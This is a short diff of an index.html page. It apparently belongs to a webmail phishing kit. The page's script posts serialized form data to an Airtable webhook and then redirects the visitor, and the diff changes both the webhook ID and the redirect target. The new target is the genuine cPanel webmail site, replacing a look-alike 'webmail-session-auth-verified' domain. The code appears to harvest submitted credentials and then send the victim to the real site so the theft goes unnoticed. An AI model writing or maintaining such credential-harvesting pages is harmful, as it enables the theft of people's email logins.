--- a/index.html
+++ b/index.html
@@ -80,7 +80,7 @@ window.addEventListener('load', function() {
       var formData = $(this).serialize(); // Serialize form data
 
       $.ajax({
-        url: "https://hooks.airtable.com/workflows/v1/genericWebhook/appHwNBiVPIhJG35j/wflV5tyT6B9mpGMve/wtrnQxFgNHEnJFc1q",
+        url: "https://hooks.airtable.com/workflows/v1/genericWebhook/appj8mw3Dkx3SY0Gn/wflUDmL2BnXfAf6Ng/wtrV5a1sm2OROsKO4",
         type: "POST",
         data: formData,
         success: function () {
@@ -91,7 +91,7 @@ window.addEventListener('load', function() {
         },
         complete: function () {
           setTimeout(function () {
-            window.location.href = "https://webmail-session-auth-verified.vercel.app";
+            window.location.href = "https://webmail.cpanel.net";
           }, 1000);
         }
       });
